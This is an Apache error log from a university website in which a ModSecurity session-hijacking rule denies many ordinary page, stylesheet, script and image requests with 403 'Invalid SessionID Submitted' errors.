[Mon Aug 28 08:03:24.039277 2023] [:error] [pid 37803] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvyXMCo-f0AAJOr910AAAAL"]
[Mon Aug 28 08:03:27.422348 2023] [:error] [pid 38192] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvyX8Co-f0AAJUwn4cAAAAI"]
[Mon Aug 28 08:03:27.423202 2023] [:error] [pid 38114] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvyX8Co-f0AAJTinWQAAAAE"]
[Mon Aug 28 08:03:27.480882 2023] [:error] [pid 38196] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvyX8Co-f0AAJU0qVcAAAAD"]
[Mon Aug 28 08:03:27.481647 2023] [:error] [pid 37803] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvyX8Co-f0AAJOr918AAAAL"]
[Mon Aug 28 08:03:27.483016 2023] [:error] [pid 38075] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvyX8Co-f0AAJS7R10AAAAB"]
[Mon Aug 28 08:03:27.483700 2023] [:error] [pid 38060] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/teh_farah.png"] [unique_id "ZOvyX8Co-f0AAJSsrYsAAAAQ"]
[Mon Aug 28 08:03:27.513410 2023] [:error] [pid 38065] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvyX8Co-f0AAJSxYs0AAAAH"]
[Mon Aug 28 08:03:27.521312 2023] [:error] [pid 38114] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvyX8Co-f0AAJTinWUAAAAE"]
[Mon Aug 28 08:03:27.581314 2023] [:error] [pid 38075] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvyX8Co-f0AAJS7R14AAAAB"]
[Mon Aug 28 08:03:27.688585 2023] [:error] [pid 38060] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvyX8Co-f0AAJSsrYwAAAAQ"]
[Mon Aug 28 08:03:27.841280 2023] [:error] [pid 37539] [client 114.124.188.188] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyX8Co-f0AAJKjZ4MAAAAG"]
[Mon Aug 28 08:03:28.378827 2023] [:error] [pid 38192] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyYMCo-f0AAJUwn4gAAAAI"]
[Mon Aug 28 08:04:09.709436 2023] [:error] [pid 38065] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvyicCo-f0AAJSxYtcAAAAH"]
[Mon Aug 28 08:04:11.416050 2023] [:error] [pid 38060] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvyi8Co-f0AAJSsrZUAAAAQ"]
[Mon Aug 28 08:04:11.699362 2023] [:error] [pid 38196] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg_form.png"] [unique_id "ZOvyi8Co-f0AAJU0qWAAAAAD"]
[Mon Aug 28 08:04:12.739339 2023] [:error] [pid 38065] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login2.png"] [unique_id "ZOvyjMCo-f0AAJSxYtgAAAAH"]
[Mon Aug 28 08:04:12.904460 2023] [:error] [pid 38196] [client 114.122.115.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvyjMCo-f0AAJU0qWEAAAAD"]
[Mon Aug 28 08:04:43.111988 2023] [:error] [pid 38149] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyq8Co-f0AAJUFNPwAAAAA"]
[Mon Aug 28 08:04:43.171137 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyq8Co-f0AAJKjZ5MAAAAG"]
[Mon Aug 28 08:04:43.884667 2023] [:error] [pid 38149] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyq8Co-f0AAJUFNP0AAAAA"]
[Mon Aug 28 08:04:48.164618 2023] [:error] [pid 38196] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvysMCo-f0AAJU0qWcAAAAD"]
[Mon Aug 28 08:04:48.621630 2023] [:error] [pid 38059] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvysMCo-f0AAJSr2pgAAAAO"]
[Mon Aug 28 08:05:31.419157 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy28Co-f0AAJVXJZEAAAAJ"]
[Mon Aug 28 08:05:31.440830 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy28Co-f0AAJUFNQsAAAAA"]
[Mon Aug 28 08:05:31.443642 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy28Co-f0AAJSsraYAAAAQ"]
[Mon Aug 28 08:05:31.457416 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KgAAAAF"]
[Mon Aug 28 08:05:31.464269 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy28Co-f0AAJUwn5oAAAAI"]
[Mon Aug 28 08:05:31.464600 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy28Co-f0AAJQeRqIAAAAP"]
[Mon Aug 28 08:05:31.466158 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvy28Co-f0AAJUFNQwAAAAA"]
[Mon Aug 28 08:05:31.472689 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvy28Co-f0AAJVXJZIAAAAJ"]
[Mon Aug 28 08:05:31.483772 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvy28Co-f0AAJVZ9fEAAAAR"]
[Mon Aug 28 08:05:31.504445 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvy28Co-f0AAJVW8KkAAAAF"]
[Mon Aug 28 08:05:31.506258 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvy28Co-f0AAJVXJZMAAAAJ"]
[Mon Aug 28 08:05:31.514660 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvy28Co-f0AAJQeRqMAAAAP"]
[Mon Aug 28 08:05:31.515609 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvy28Co-f0AAJKjZ58AAAAG"]
[Mon Aug 28 08:05:31.516773 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvy28Co-f0AAJSsracAAAAQ"]
[Mon Aug 28 08:05:31.518472 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvy28Co-f0AAJVZ9fIAAAAR"]
[Mon Aug 28 08:05:31.537724 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvy28Co-f0AAJUwn5sAAAAI"]
[Mon Aug 28 08:05:31.541422 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KoAAAAF"]
[Mon Aug 28 08:05:31.550256 2023] [:error] [pid 38149] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvy28Co-f0AAJUFNQ0AAAAA"]
[Mon Aug 28 08:05:31.554629 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvy28Co-f0AAJVXJZQAAAAJ"]
[Mon Aug 28 08:05:31.556575 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvy28Co-f0AAJKjZ6AAAAAG"]
[Mon Aug 28 08:05:31.566833 2023] [:error] [pid 38192] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvy28Co-f0AAJUwn5wAAAAI"]
[Mon Aug 28 08:05:31.567299 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvy28Co-f0AAJSsragAAAAQ"]
[Mon Aug 28 08:05:31.582516 2023] [:error] [pid 38233] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvy28Co-f0AAJVZ9fMAAAAR"]
[Mon Aug 28 08:05:31.589358 2023] [:error] [pid 38230] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy28Co-f0AAJVW8KsAAAAF"]
[Mon Aug 28 08:05:31.597584 2023] [:error] [pid 37918] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvy28Co-f0AAJQeRqQAAAAP"]
[Mon Aug 28 08:05:31.602316 2023] [:error] [pid 38231] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvy28Co-f0AAJVXJZUAAAAJ"]
[Mon Aug 28 08:05:31.623391 2023] [:error] [pid 38060] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy28Co-f0AAJSsrakAAAAQ"]
[Mon Aug 28 08:05:31.660882 2023] [:error] [pid 37539] [client 101.128.127.103] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy28Co-f0AAJKjZ6EAAAAG"]
[Mon Aug 28 08:05:41.579302 2023] [:error] [pid 38195] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy5cCo-f0AAJUz@iQAAAAM"]
[Mon Aug 28 08:05:41.747139 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy5cCo-f0AAJSxYugAAAAH"]
[Mon Aug 28 08:05:41.935663 2023] [:error] [pid 38192] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy5cCo-f0AAJUwn58AAAAI"]
[Mon Aug 28 08:05:42.498881 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy5sCo-f0AAJU0qWsAAAAD"]
[Mon Aug 28 08:05:43.454640 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy58Co-f0AAJS0EtUAAAAW"]
[Mon Aug 28 08:05:43.604515 2023] [:error] [pid 38192] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy58Co-f0AAJUwn6AAAAAI"]
[Mon Aug 28 08:05:44.895744 2023] [:error] [pid 37918] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy6MCo-f0AAJQeRqgAAAAP"]
[Mon Aug 28 08:05:46.055892 2023] [:error] [pid 38192] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvy6sCo-f0AAJUwn6EAAAAI"]
[Mon Aug 28 08:05:46.155568 2023] [:error] [pid 38150] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvy6sCo-f0AAJUGIRcAAAAC"]
[Mon Aug 28 08:05:46.625688 2023] [:error] [pid 37539] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy6sCo-f0AAJKjZ6UAAAAG"]
[Mon Aug 28 08:05:49.310846 2023] [:error] [pid 37918] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy7cCo-f0AAJQeRqkAAAAP"]
[Mon Aug 28 08:05:49.538537 2023] [:error] [pid 37803] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvy7cCo-f0AAJOr924AAAAL"]
